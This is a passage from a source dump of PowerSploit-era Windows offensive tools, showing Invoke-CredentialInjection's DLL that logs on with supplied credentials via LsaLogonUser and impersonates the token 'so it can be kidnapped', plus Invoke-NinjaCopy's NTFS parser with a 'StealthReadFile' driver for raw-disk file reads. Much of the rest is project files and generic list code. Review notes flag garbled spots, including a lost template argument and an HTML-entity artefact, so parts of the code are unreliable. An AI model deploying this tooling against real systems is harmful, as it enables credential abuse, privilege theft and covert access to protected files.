WriteErrorToPipe(errorMsg, pipe);
return;
}

ULONG authPackage = 0;
PLSA_STRING authPackageName = new LSA_STRING(); // never deleted; a stack LSA_STRING would do
authPackageName->Buffer = authPackageBuf;
authPackageName->Length = (USHORT)strlen(authPackageBuf);
authPackageName->MaximumLength = (USHORT)strlen(authPackageBuf);
status = LsaLookupAuthenticationPackage(hLSA, authPackageName, &authPackage);
if (status != 0)
{
int winError = LsaNtStatusToWinError(status);
string errorMsg = "Call to LsaLookupAuthenticationPackage failed. Error code: " + to_string(winError);
WriteErrorToPipe(errorMsg, pipe);
return;
}

//Get TokenSource
// The TOKEN_SOURCE of the current process token is reused as the SourceContext of
// the new logon session. Only GetTokenInformation(TokenSource) is performed on
// procToken, so TOKEN_QUERY would suffice instead of TOKEN_ALL_ACCESS.
HANDLE hProcess = GetCurrentProcess();//todo
HANDLE procToken = NULL;
success = OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &procToken);
if (!success)
{
DWORD errorCode = GetLastError();
string errorMsg = "Call to OpenProcessToken failed. Errorcode: " + to_string(errorCode);
WriteErrorToPipe(errorMsg, pipe);
return;
}

TOKEN_SOURCE tokenSource = {};
DWORD realSize = 0;
success = GetTokenInformation(procToken, TokenSource, &tokenSource, sizeof(tokenSource), &realSize);
if (!success)
{
string errorMsg = "Call to GetTokenInformation failed."; // GetLastError is not reported here
WriteErrorToPipe(errorMsg, pipe);
return;
}

//Misc out parameters
// Filled in by LsaLogonUser; loginId and quotaLimits are left uninitialised
// because LSA writes them.
PVOID profileBuffer = NULL;
ULONG profileBufferSize = 0;
LUID loginId;
HANDLE token = NULL;
QUOTA_LIMITS quotaLimits;
NTSTATUS subStatus = 0;

//Log on the user
// The 7th argument (LocalGroups) is 0: no additional groups are added to the token.
// NOTE(review): `static_cast(logonType)` has lost its template argument in this
// copy (presumably SECURITY_LOGON_TYPE), and `"aLimits` reads like an HTML-entity
// extraction artefact for the address-of expression on quotaLimits; verify both
// against the original source before building.
status = LsaLogonUser(hLSA,
&originName,
static_cast(logonType),
authPackage,
authBuffer,
authBufferSize,
0,
&tokenSource,
&profileBuffer,
&profileBufferSize,
&loginId,
&token,
"aLimits,
&subStatus);

if (status != 0)
{
NTSTATUS winError = LsaNtStatusToWinError(status); // ULONG result stored in a signed NTSTATUS
string errorMsg = "Error calling LsaLogonUser. Error code: " + to_string(winError); // subStatus is not reported
WriteErrorToPipe(errorMsg, pipe);
return;
}


//Impersonate the token with the current thread so it can be kidnapped
ImpersonateLoggedOnUser(token); // return value unchecked: a failed impersonation is still reported as success below

//Put the thread to sleep so it can be impersonated
string successMsg = "Logon succeeded, impersonating the token so it can be kidnapped and starting an infinite loop with the thread.";
WriteErrorToPipe(successMsg, pipe); // success is reported through the same "error" writer
HANDLE permenantSleep = CreateMutex(NULL, false, NULL); // handle is never used or closed
while(1)
{
Sleep(MAXDWORD); // never exits; the thread keeps the impersonation token alive
}

return; // unreachable
}
209 |
210 |
// Builds a KERB_INTERACTIVE_LOGON followed by the three strings in a single heap
// block so the whole thing can be passed to LsaLogonUser as
// AuthenticationInformation. The strings are stored without NUL terminators
// (UNICODE_STRING is counted) directly after the fixed header, and the header's
// UNICODE_STRING members point into the same block. *size receives the block
// length in bytes. Returns the block, allocated with new BYTE[]; nothing in this
// file frees it.
// NOTE(review): the local is named ntlmLogon although this is the Kerberos
// variant; apart from the types the body duplicates CreateNtlmLogonStructure.
PVOID CreateKerbLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size)
{
size_t wcharSize = sizeof(wchar_t);

// Header plus the raw character bytes of all three strings, no terminators.
size_t totalSize = sizeof(KERB_INTERACTIVE_LOGON) + ((lstrlenW(domain) + lstrlenW(username) + lstrlenW(password)) * wcharSize);
KERB_INTERACTIVE_LOGON* ntlmLogon = (PKERB_INTERACTIVE_LOGON)(new BYTE[totalSize]);
size_t writeAddress = (UINT_PTR)ntlmLogon + sizeof(KERB_INTERACTIVE_LOGON); // first string starts right after the header

ntlmLogon->MessageType = KerbInteractiveLogon;
// Each write appends its string and advances writeAddress by the bytes written.
writeAddress += WriteUnicodeString(domain, &(ntlmLogon->LogonDomainName), (PVOID)writeAddress);
writeAddress += WriteUnicodeString(username, &(ntlmLogon->UserName), (PVOID)writeAddress);
writeAddress += WriteUnicodeString(password, &(ntlmLogon->Password), (PVOID)writeAddress);

*size = (DWORD)totalSize; //If the size is bigger than a DWORD, there is a gigantic bug somewhere.
return ntlmLogon;
}
227 |
228 |
// Builds an MSV1_0_INTERACTIVE_LOGON followed by the three strings in a single
// heap block so the whole thing can be passed to LsaLogonUser as
// AuthenticationInformation. The strings are stored without NUL terminators
// (UNICODE_STRING is counted) directly after the fixed header, and the header's
// UNICODE_STRING members point into the same block. *size receives the block
// length in bytes. Returns the block, allocated with new BYTE[]; nothing in this
// file frees it. Mirrors CreateKerbLogonStructure with the MSV1_0 types.
PVOID CreateNtlmLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size)
{
size_t wcharSize = sizeof(wchar_t);

// Header plus the raw character bytes of all three strings, no terminators.
size_t totalSize = sizeof(MSV1_0_INTERACTIVE_LOGON) + ((lstrlenW(domain) + lstrlenW(username) + lstrlenW(password)) * wcharSize);
MSV1_0_INTERACTIVE_LOGON* ntlmLogon = (PMSV1_0_INTERACTIVE_LOGON)(new BYTE[totalSize]);
size_t writeAddress = (UINT_PTR)ntlmLogon + sizeof(MSV1_0_INTERACTIVE_LOGON); // first string starts right after the header

ntlmLogon->MessageType = MsV1_0InteractiveLogon;
// Each write appends its string and advances writeAddress by the bytes written.
writeAddress += WriteUnicodeString(domain, &(ntlmLogon->LogonDomainName), (PVOID)writeAddress);
writeAddress += WriteUnicodeString(username, &(ntlmLogon->UserName), (PVOID)writeAddress);
writeAddress += WriteUnicodeString(password, &(ntlmLogon->Password), (PVOID)writeAddress);

*size = (DWORD)totalSize; //If the size is bigger than a DWORD, there is a gigantic bug somewhere.
return ntlmLogon;
}
245 |
//Returns the amount of bytes written.
// Copies str (without its NUL) to address and fills uniStr so that Length and
// MaximumLength hold the byte count and Buffer points at address. There is no
// bounds check: the caller must have sized the destination block. The (USHORT)
// casts truncate byte counts above 65535 (32767 wchar_t); within this file the
// inputs come from VoidFunc, which reads at most 256 characters per string.
size_t WriteUnicodeString(const wchar_t* str, UNICODE_STRING* uniStr, PVOID address)
{
size_t size = lstrlenW(str) * sizeof(wchar_t);
uniStr->Length = (USHORT)size;
uniStr->MaximumLength = (USHORT)size;
uniStr->Buffer = (PWSTR)address;
memcpy(address, str, size);
return size;
}
256 |
// Writes errorMsg (without its terminating NUL) to the already-open pipe handle.
// Despite the name it also carries the final success message. This is
// best-effort: the WriteFile result is not inspected, and the byte count it
// reports is received but never read.
void WriteErrorToPipe(string errorMsg, HANDLE pipe)
{
const char* text = errorMsg.c_str();
const DWORD length = static_cast<DWORD>(strlen(text));
DWORD written = 0;
WriteFile(pipe, text, length, &written, NULL);
}
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/logon/logon.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}
23 | Win32Proj
24 | logon
25 |
26 |
27 |
28 | DynamicLibrary
29 | true
30 | v120
31 | Unicode
32 |
33 |
34 | DynamicLibrary
35 | true
36 | v120
37 | Unicode
38 |
39 |
40 | DynamicLibrary
41 | false
42 | v120
43 | true
44 | Unicode
45 |
46 |
47 | DynamicLibrary
48 | false
49 | v120
50 | true
51 | Unicode
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | true
71 |
72 |
73 | true
74 |
75 |
76 | false
77 |
78 |
79 | false
80 |
81 |
82 |
83 | Use
84 | Level3
85 | Disabled
86 | WIN32;_DEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)
87 |
88 |
89 | Windows
90 | true
91 | secur32.lib;%(AdditionalDependencies)
92 |
93 |
94 |
95 |
96 | Use
97 | Level3
98 | Disabled
99 | WIN32;_DEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)
100 |
101 |
102 | Windows
103 | true
104 | secur32.lib;%(AdditionalDependencies)
105 |
106 |
107 |
108 |
109 | Level3
110 | Use
111 | MaxSpeed
112 | true
113 | true
114 | WIN32;NDEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)
115 | MultiThreaded
116 |
117 |
118 | Windows
119 | true
120 | true
121 | true
122 | secur32.lib;%(AdditionalDependencies)
123 |
124 |
125 |
126 |
127 | Level3
128 | Use
129 | MaxSpeed
130 | true
131 | true
132 | WIN32;NDEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)
133 | MultiThreaded
134 |
135 |
136 | Windows
137 | true
138 | true
139 | true
140 | secur32.lib;%(AdditionalDependencies)
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 | false
153 | false
154 |
155 |
156 |
157 |
158 | false
159 | false
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 | Create
168 | Create
169 | Create
170 | Create
171 |
172 |
173 |
174 |
175 |
176 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/logon/logon.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/logon/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // logon.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/logon/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include "targetver.h"
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 | #include
21 | #include
22 |
23 |
24 |
25 | // TODO: reference additional headers your program requires here
26 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/logon/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/README.md:
--------------------------------------------------------------------------------
1 | The tools in this directory are part of PowerSploit and are being maintained there. They are preserved here for legacy purposes, but any bug fixes should be checked in to PowerSploit.
2 |
3 | https://github.com/mattifestation/PowerSploit
--------------------------------------------------------------------------------
/Invoke-Mimikatz/README.md:
--------------------------------------------------------------------------------
1 | The tools in this directory are part of PowerSploit and are being maintained there. They are preserved here for legacy purposes, but any bug fixes should be checked in to PowerSploit.
2 |
3 | https://github.com/mattifestation/PowerSploit
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParser.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NTFSParserDLL", "NTFSParserDLL\NTFSParserDLL.vcxproj", "{5E42B778-F231-4797-B7FD-7D5BCA9738D0}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.Build.0 = Debug|Win32
16 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.ActiveCfg = Debug|x64
17 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.Build.0 = Debug|x64
18 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.ActiveCfg = Release|Win32
19 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.Build.0 = Release|Win32
20 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.ActiveCfg = Release|x64
21 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParser/NTFS.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS include files
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_H_CYB70289
18 | #define __NTFS_H_CYB70289
19 |
20 | #pragma pack(8)
21 |
22 | #include "NTFS_Common.h"
23 | #include "NTFS_FileRecord.h"
24 | #include "NTFS_Attribute.h"
25 |
26 | #pragma pack()
27 |
28 | #endif
29 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParser/NTFSParser.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | *
3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
4 | *
5 | * This program/include file is free software; you can redistribute it and/or
6 | * modify it under the terms of the GNU General Public License as published
7 | * by the Free Software Foundation; either version 2 of the License, or
8 | * (at your option) any later version.
9 | *
10 | * This program/include file is distributed in the hope that it will be
11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | * GNU General Public License for more details.
14 | */
15 | //
16 | // This code uses libraries released under GPLv2(or later) written by cyb70289
17 |
18 | #include "stdafx.h"
19 | #include "NTFS.h"
20 | #include "NTFS_Attribute.h"
21 | #include "NTFS_Common.h"
22 | #include "NTFS_DataType.h"
23 | #include "NTFS_FileRecord.h"
24 |
25 | using namespace std;
26 |
// Signature of the StealthReadFile export resolved from NTFSParserDLL.dll in
// _tmain. From the call there: (path, destination buffer, buffer size,
// a 64-bit value passed as 0 — presumably a file offset, confirm in the DLL,
// out: bytes read, out: bytes left). Returns a DWORD status code.
typedef DWORD (CDECL *StealthReadFile_Func)(string, BYTE*, DWORD, ULONGLONG, DWORD*, ULONGLONG*);
28 |
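// Demo driver: loads NTFSParserDLL.dll, asks it to read c:\test\test.txt into
// a 1 MiB buffer and writes whatever came back to c:\test\test2.txt.
// Returns 0 on success, 1 when the DLL, its export or the output file is
// unavailable. The original dereferenced the LoadLibrary/GetProcAddress
// results unchecked, went through a HANDLE to hold a function pointer, and
// never released the buffer or the module.
int _tmain(int argc, _TCHAR* argv[])
{
	HMODULE parserDLLHandle = LoadLibraryA("NTFSParserDLL.dll");
	if (parserDLLHandle == NULL)
	{
		cout << "LoadLibraryA(NTFSParserDLL.dll) failed: " << GetLastError() << endl;
		return 1;
	}

	// FARPROC -> typed function pointer; no intermediate HANDLE.
	StealthReadFile_Func StealthReadFile = (StealthReadFile_Func)GetProcAddress(parserDLLHandle, "StealthReadFile");
	if (StealthReadFile == NULL)
	{
		cout << "GetProcAddress(StealthReadFile) failed: " << GetLastError() << endl;
		FreeLibrary(parserDLLHandle);
		return 1;
	}

	// Scratch buffer; the DLL reports how much of it was filled (bytesRead)
	// and how much of the file remains (bytesLeft).
	const DWORD buffSize = 1024*1024;
	BYTE* buffer = new BYTE[buffSize];
	DWORD bytesRead = 0;
	ULONGLONG bytesLeft = 0;
	DWORD ret = StealthReadFile("c:\\test\\test.txt", buffer, buffSize, 0, &bytesRead, &bytesLeft);

	cout << "Return value: " << ret << endl;

	int exitCode = 0;
	ofstream myFile("c:\\test\\test2.txt", ios::out | ios::binary);
	if (myFile.is_open())
	{
		// Only the bytes the DLL actually produced are persisted.
		myFile.write((char*)buffer, bytesRead);
	}
	else
	{
		cout << "Could not open c:\\test\\test2.txt for writing" << endl;
		exitCode = 1;
	}

	delete[] buffer;
	FreeLibrary(parserDLLHandle);
	return exitCode;
}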
49 |
50 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParser/NTFSParser.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {2F38A7A9-D810-451B-BB19-273770AF4D25}
23 | Win32Proj
24 | NTFSParser
25 |
26 |
27 |
28 | Application
29 | true
30 | v110
31 | NotSet
32 |
33 |
34 | Application
35 | true
36 | v110
37 | NotSet
38 |
39 |
40 | Application
41 | false
42 | v110
43 | true
44 | Unicode
45 |
46 |
47 | Application
48 | false
49 | v110
50 | true
51 | Unicode
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | true
71 |
72 |
73 | true
74 |
75 |
76 | false
77 |
78 |
79 | false
80 |
81 |
82 |
83 | Use
84 | Level3
85 | Disabled
86 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
87 | false
88 |
89 |
90 | Console
91 | true
92 |
93 |
94 |
95 |
96 | Use
97 | Level3
98 | Disabled
99 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
100 | false
101 |
102 |
103 | Console
104 | true
105 |
106 |
107 |
108 |
109 | Level3
110 | Use
111 | MaxSpeed
112 | true
113 | true
114 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
115 | true
116 |
117 |
118 | Console
119 | true
120 | true
121 | true
122 |
123 |
124 |
125 |
126 | Level3
127 | Use
128 | MaxSpeed
129 | true
130 | true
131 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 | Create
157 | Create
158 | Create
159 | Create
160 |
161 |
162 |
163 |
164 |
165 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParser/NTFSParser.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 | Header Files
32 |
33 |
34 | Header Files
35 |
36 |
37 | Header Files
38 |
39 |
40 | Header Files
41 |
42 |
43 |
44 |
45 | Source Files
46 |
47 |
48 | Source Files
49 |
50 |
51 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParser/NTFS_Common.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS Class common definitions
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_COMMON_H_CYB70289
18 | #define __NTFS_COMMON_H_CYB70289
19 |
20 | #include
21 | #include
22 | #include
23 | #include
24 |
25 | #include "NTFS_DataType.h"
26 |
27 | #define ATTR_NUMS 16 // Attribute Types count
28 | #define ATTR_INDEX(at) (((at)>>4)-1) // Attribute Type to Index, eg. 0x10->0, 0x30->2
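// Attribute Type to bit mask, eg. 0x10->bit 0, 0x30->bit 2.
// NOTE(review): this copy of the file is cut off right after the '<' of this
// macro and the declarations that followed it are missing; the shift below is
// reconstructed from ATTR_INDEX and should be confirmed against upstream.
#define ATTR_MASK(at) (((DWORD)1)<<ATTR_INDEX(at))

// Node of the singly linked lists used by CSList and CStack below. The node
// itself owns nothing; the containers decide whether Entry is deleted
// (RemoveAll) or left alone (ThrowAll).
template <class ENTRY_TYPE>
struct NTSLIST_ENTRY
{
	NTSLIST_ENTRY *Next;
	ENTRY_TYPE *Entry;
};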
82 |
83 | // List Entry Smart Pointer
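// Owning pointer wrapper for a single list entry: deletes the pointee in the
// destructor and whenever a different pointer is assigned.
// NOTE(review): no copy constructor is declared, so copying one of these
// objects makes two owners of the same pointee and a double delete; callers
// must not copy it. Left undeclared to keep the public interface unchanged.
template <class ENTRY_TYPE>
class CEntrySmartPtr
{
public:
	// Takes ownership of ptr (may be NULL).
	CEntrySmartPtr(ENTRY_TYPE *ptr = NULL)
	{
		EntryPtr = ptr;
	}

	virtual ~CEntrySmartPtr()
	{
		if (EntryPtr)
			delete EntryPtr;
	}

private:
	const ENTRY_TYPE *EntryPtr;

public:
	// Replace the owned pointer, deleting the previous one.
	// Returns a reference: the original returned *this by value, and the
	// temporary copy deleted EntryPtr in its own destructor, leaving this
	// object with a dangling pointer that was deleted again later.
	// Assigning the pointer already held is a no-op for the same reason.
	__inline CEntrySmartPtr& operator = (const ENTRY_TYPE* ptr)
	{
		if (ptr != EntryPtr)
		{
			// Delete previous pointer if allocated
			if (EntryPtr)
				delete EntryPtr;

			EntryPtr = ptr;
		}

		return *this;
	}

	// Dereference; asserts in debug builds when nothing is owned.
	__inline const ENTRY_TYPE* operator->() const
	{
		_ASSERT(EntryPtr);
		return EntryPtr;
	}

	// TRUE when a pointee is owned.
	__inline BOOL IsValid() const
	{
		return EntryPtr != NULL;
	}
};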
125 |
126 | //////////////////////////////////////
127 | // Single list implementation
128 | //////////////////////////////////////
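// Singly linked list of ENTRY_TYPE* with a single built-in iteration cursor.
// The list owns its entries: RemoveAll (and the destructor) delete them;
// ThrowAll drops them without freeing. Not safe for concurrent use — the
// cursor is shared state.
template <class ENTRY_TYPE>
class CSList
{
public:
	CSList()
	{
		ListHead = ListTail = NULL;
		ListCurrent = NULL;
		EntryCount = 0;
	}

	// Frees every node and every entry.
	virtual ~CSList()
	{
		RemoveAll();
	}

private:
	int EntryCount;
	NTSLIST_ENTRY<ENTRY_TYPE> *ListHead;
	NTSLIST_ENTRY<ENTRY_TYPE> *ListTail;
	// Iteration cursor for FindFirstEntry/FindNextEntry. mutable so the const
	// iteration methods can move it without casting away const, which is what
	// the original ((CSList*)this)->ListCurrent did.
	mutable NTSLIST_ENTRY<ENTRY_TYPE> *ListCurrent;

public:
	// Get entry count
	__inline int GetCount() const
	{
		return EntryCount;
	}

	// Insert to tail. The list takes ownership of entry (see RemoveAll).
	BOOL InsertEntry(ENTRY_TYPE *entry)
	{
		NTSLIST_ENTRY<ENTRY_TYPE> *le = new NTSLIST_ENTRY<ENTRY_TYPE>;
		if (!le) // standard new throws; this only fires with a NULL-returning allocator
			return FALSE;

		le->Entry = entry;
		le->Next = NULL;

		if (ListTail == NULL)
			ListHead = le; // Empty list
		else
			ListTail->Next = le;

		ListTail = le;

		EntryCount++;
		return TRUE;
	}

	// Remove all entries
	// Deletes the entries as well as the nodes; use ThrowAll to keep the entries.
	void RemoveAll()
	{
		while (ListHead)
		{
			ListCurrent = ListHead->Next;
			delete ListHead->Entry;
			delete ListHead;

			ListHead = ListCurrent;
		}

		ListHead = ListTail = NULL;
		ListCurrent = NULL;
		EntryCount = 0;
	}

	// Find first entry
	// Resets the cursor to the head; returns NULL when the list is empty.
	__inline ENTRY_TYPE *FindFirstEntry() const
	{
		ListCurrent = ListHead;

		if (ListCurrent)
			return ListCurrent->Entry;
		else
			return NULL;
	}

	// Find next entry
	// Advances the cursor; returns NULL once past the tail and stays there
	// until FindFirstEntry is called again.
	__inline ENTRY_TYPE *FindNextEntry() const
	{
		if (ListCurrent)
			ListCurrent = ListCurrent->Next;

		if (ListCurrent)
			return ListCurrent->Entry;
		else
			return NULL;
	}

	// Throw all entries
	// Caution! All entries are just thrown without free
	// NOTE(review): the list nodes are leaked as well, not only the entries.
	__inline void ThrowAll()
	{
		ListHead = ListTail = NULL;
		ListCurrent = NULL;
		EntryCount = 0;
	}
}; //CSList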
228 |
229 |
230 | //////////////////////////////////////
231 | // Stack implementation
232 | //////////////////////////////////////
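// LIFO stack of ENTRY_TYPE* built on the same NTSLIST_ENTRY nodes as CSList.
// Push/Pop work at the head; Pop hands ownership of the entry back to the
// caller, RemoveAll (and the destructor) delete whatever is still stacked.
template <class ENTRY_TYPE>
class CStack
{
public:
	CStack()
	{
		ListHead = ListTail = NULL;
		EntryCount = 0;
	}

	// Frees every node and every remaining entry.
	virtual ~CStack()
	{
		RemoveAll();
	}

private:
	int EntryCount;
	NTSLIST_ENTRY<ENTRY_TYPE> *ListHead;
	NTSLIST_ENTRY<ENTRY_TYPE> *ListTail;

public:
	// Get entry count
	__inline int GetCount() const
	{
		return EntryCount;
	}

	// Insert to head. The stack takes ownership of entry until it is popped.
	BOOL Push(ENTRY_TYPE *entry)
	{
		NTSLIST_ENTRY<ENTRY_TYPE> *le = new NTSLIST_ENTRY<ENTRY_TYPE>;
		if (!le) // standard new throws; this only fires with a NULL-returning allocator
			return FALSE;

		le->Entry = entry;
		le->Next = ListHead;

		ListHead = le;

		if (ListTail == NULL)
			ListTail = le; // Empty list

		EntryCount ++;
		return TRUE;
	}

	// Remove from head
	// Returns the entry (caller now owns it) or NULL when empty. Popping the
	// last element also clears ListTail, since Head->Next is NULL then.
	ENTRY_TYPE* Pop()
	{
		if (ListHead == NULL)
			return NULL;

		NTSLIST_ENTRY<ENTRY_TYPE> *le = ListHead;
		ENTRY_TYPE *e = le->Entry;

		if (ListTail == ListHead)
			ListTail = ListHead->Next;
		ListHead = ListHead->Next;

		delete le;
		EntryCount --;

		return e;
	}

	// Remove all entries
	// Deletes the entries as well as the nodes.
	void RemoveAll()
	{
		NTSLIST_ENTRY<ENTRY_TYPE> *le;

		while (ListHead)
		{
			le = ListHead->Next;
			delete ListHead->Entry;
			delete ListHead;

			ListHead = le;
		}

		ListHead = ListTail = NULL;
		EntryCount = 0;
	}
}; //CStack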
316 |
317 | #endif
318 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParser/NTFS_DataType.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS data structures and definitions
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_DATATYPE_H_CYB70289
18 | #define __NTFS_DATATYPE_H_CYB70289
19 |
20 | // NTFS Boot Sector BPB
21 |
22 | #define NTFS_SIGNATURE "NTFS "
23 |
24 | #pragma pack(1)
// NTFS boot sector as read from disk: jump, OEM signature, BPB/extended BPB,
